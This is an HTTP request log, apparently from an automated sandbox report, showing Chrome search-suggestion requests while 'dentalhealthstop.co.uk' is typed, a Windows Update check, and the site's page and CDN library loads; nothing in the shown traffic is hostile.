Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dent&oit=1&cp=4&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=denta&oit=1&cp=5&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dental&oit=1&cp=6&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhea&oit=1&cp=9&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhealt&oit=1&cp=11&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhealth&oit=1&cp=12&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3Ddentalhealth%26oit%3D1%26cp%3D12%26pgcl%3D4%26gs_rn%3D42%26psi%3D8AFy-_Mu70iYE25H%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGLa2o7EGIjDb6fpxk0dLXDVk8WJr0pupjTzgtn2DD3wBHtk8PFlHz1XwjTnBxJ5yTl6nO3uNT40yAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhealths&oit=1&cp=13&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /SLS/%7BE7A50285-D08D-499D-9FF8-180FDC2332BC%7D/x64/10.0.19045.2006/0?CH=700&L=en-GB&P=&PT=0x30&WUA=10.0.19041.1949&MK=c9UsdYNfmbzDR9B&MD=kM2l1z7B HTTP/1.1Connection: Keep-AliveAccept: */*User-Agent: Windows-Update-Agent/10.0.10011.16384 Client-Protocol/2.33Host: slscr.update.microsoft.com
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhealthst&oit=1&cp=14&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=dentalhealthstop&oit=1&cp=16&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /sorry/index?continue=https://www.google.com/complete/search%3Fclient%3Dchrome-omni%26gs_ri%3Dchrome-ext-ansg%26xssi%3Dt%26q%3Ddentalhealthstop%26oit%3D1%26cp%3D16%26pgcl%3D4%26gs_rn%3D42%26psi%3D8AFy-_Mu70iYE25H%26sugkey%3DAIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw&q=EgSaEGkkGLm2o7EGIjDdeIXkDkr1W7MIzfg46MVbhiDIQSvJ1vzKr805RbfXbDnwI-AyyKzOgsHWRDgEy6YyAXJKGVNPUlJZX0FCVVNJVkVfTkVUX01FU1NBR0VaAUM HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=httdentalhealthstop&oit=1&cp=3&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=httpdentalhealthstop&oit=1&cp=4&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=httpsdentalhealthstop&oit=1&cp=5&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3Adentalhealthstop&oit=3&cp=6&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2Fdentalhealthstop&oit=3&cp=7&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop&oit=3&cp=8&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=&oit=0&gs_rn=42&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop&oit=3&cp=24&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop.&oit=3&cp=25&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop.c&oit=3&cp=26&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop.co.u&oit=3&cp=29&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /complete/search?client=chrome-omni&gs_ri=chrome-ext-ansg&xssi=t&q=https%3A%2F%2Fdentalhealthstop.co.uk&oit=3&cp=30&pgcl=4&gs_rn=42&psi=8AFy-_Mu70iYE25H&sugkey=AIzaSyBOti4mM-6x9WDnZIjIeyEU21OpBXqWBgw HTTP/1.1Host: www.google.comConnection: keep-aliveX-Client-Data: CIu2yQEIprbJAQipncoBCLbgygEIk6HLAQj2mM0BCIWgzQEI3L3NAQiSys0BCLnKzQEIx9HNAQiJ080BCNzTzQEIy9bNAQj01s0BCIrXzQEIp9jNAQj5wNQVGLrSzQEYy9jNARjrjaUXSec-Fetch-Site: noneSec-Fetch-Mode: no-corsSec-Fetch-Dest: emptyUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET / HTTP/1.1Host: dentalhealthstop.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0sec-ch-ua-platform: "Windows"Upgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Sec-Fetch-Site: noneSec-Fetch-Mode: navigateSec-Fetch-User: ?1Sec-Fetch-Dest: documentAccept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.css HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: styleReferer: https://dentalhealthstop.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0-beta/css/bootstrap.min.css HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dentalhealthstop.co.uksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: text/css,*/*;q=0.1Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: styleReferer: https://dentalhealthstop.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/cookieconsent2/3.0.3/cookieconsent.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: no-corsSec-Fetch-Dest: scriptReferer: https://dentalhealthstop.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/dentalhealthstop/images/shield.png HTTP/1.1Host: dentalhealthstop.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dentalhealthstop.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /wp-content/themes/dentalhealthstop/images/dhs-icon.png HTTP/1.1Host: dentalhealthstop.co.ukConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"sec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: image/avif,image/webp,image/apng,image/svg+xml,image/*,*/*;q=0.8Sec-Fetch-Site: same-originSec-Fetch-Mode: no-corsSec-Fetch-Dest: imageReferer: https://dentalhealthstop.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /ajax/libs/popper.js/1.11.0/umd/popper.min.js HTTP/1.1Host: cdnjs.cloudflare.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dentalhealthstop.co.uksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dentalhealthstop.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /bootstrap/4.0.0-beta/js/bootstrap.min.js HTTP/1.1Host: maxcdn.bootstrapcdn.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dentalhealthstop.co.uksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dentalhealthstop.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
Source: global trafficHTTP traffic detected: GET /jquery-3.2.1.slim.min.js HTTP/1.1Host: code.jquery.comConnection: keep-alivesec-ch-ua: "Google Chrome";v="117", "Not;A=Brand";v="8", "Chromium";v="117"Origin: https://dentalhealthstop.co.uksec-ch-ua-mobile: ?0User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/117.0.0.0 Safari/537.36sec-ch-ua-platform: "Windows"Accept: */*Sec-Fetch-Site: cross-siteSec-Fetch-Mode: corsSec-Fetch-Dest: scriptReferer: https://dentalhealthstop.co.uk/Accept-Encoding: gzip, deflate, brAccept-Language: en-US,en;q=0.9
